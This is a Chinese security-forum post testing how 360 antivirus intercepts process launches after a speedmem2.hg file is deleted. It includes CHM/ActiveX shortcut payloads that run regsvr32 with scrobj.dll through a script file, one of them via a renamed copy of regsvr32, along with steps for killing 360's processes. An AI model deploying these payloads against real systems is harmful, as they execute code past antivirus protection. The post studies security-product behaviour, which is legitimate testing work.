https://bbs.kafan.cn/thread-2121300-1-1.html
承接这个帖子,发现删了speedmem2.hg就能恢复正常拦截了。
于是进一步试验,发现speedmem2.hg和各种命令行拦截之间的关系错乱的一塌糊涂。。。。
---------------------------------------------------------------
我们这样测试:
- <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
- <PARAM name="Command" value="ShortCut">
- <PARAM name="Button" value="Bitmap::shortcut">
- <PARAM name="Item1" value=",regsvr32.exe,/u /n /s /i:1.txt scrobj.dll ,">
- <PARAM name="Item2" value="273,1,1">
- </OBJECT>
- <SCRIPT>
- x.Click();
- </SCRIPT>
复制代码 把上面这个编译成regsvr32.chm
- <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
- <PARAM name="Command" value="ShortCut">
- <PARAM name="Button" value="Bitmap::shortcut">
- <PARAM name="Item1" value=',cmd.exe,/c copy j:\windows\system32\regsvr32.exe d:\test.exe'>
- <PARAM name="Item2" value="273,1,1">
- </OBJECT>
- <OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
- <PARAM name="Command" value="ShortCut">
- <PARAM name="Button" value="Bitmap::shortcut">
- <PARAM name="Item1" value=",d:\test.exe,/u /n /s /i:1.txt scrobj.dll ,">
- <PARAM name="Item2" value="273,1,1">
- </OBJECT>
- <script type="text/javascript">
- x.Click();
- setTimeout("y.Click()",3000);
- </SCRIPT>
复制代码
把上面这个编译成cmd_regsvr32.chm(注意J:\windows是我个人的windows目录,你要改成你的C盘再编译,不然没法运行)。
接下来,先关闭360的zhudongfangyu服务。然后:
1.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行regsvr32.chm,会发现360正常拦截。
2.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行cmd_regsvr32.chm,会发现360不拦截。第一步启动cmd.exe和第二步启动test.exe,这两步都不拦截。
3.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,运行regsvr32.chm,360拦截,点阻止,再运行cmd_regsvr32.chm,360又会拦截了。第一步启动cmd.exe和第二步启动test.exe都会拦截(拦截第二步的前提是D:\test.exe已经存在)
4.用pchunter结束360的所有进程,强制删除speedmem2.hg,重启360,开始菜单搜索里输入cmd.exe,打开cmd.exe,在cmd里面输入
explorer 1.exe,回车,360拦截“利用explorer入侵电脑”,点阻止,再运行regsvr32.chm,360拦截,点阻止,再运行cmd_regsvr32.chm,360第一步已经不拦截了,只拦截的是第二步。
-------------------------------------------------------------------------
大致就是上述这四种情况。这关系够乱吧。
如果speedmem2.hg是为了优化性能,那么我完全理解这个做法。只是优化个性能,也不至于把事情搞这么复杂吧?不知道各位怎么看?
PS:本帖不讨论绕过方法,我对cmd_regsvr32.chm是否绕过了360正常情况下的拦截并不关心,希望大家别回复讨论这个。
|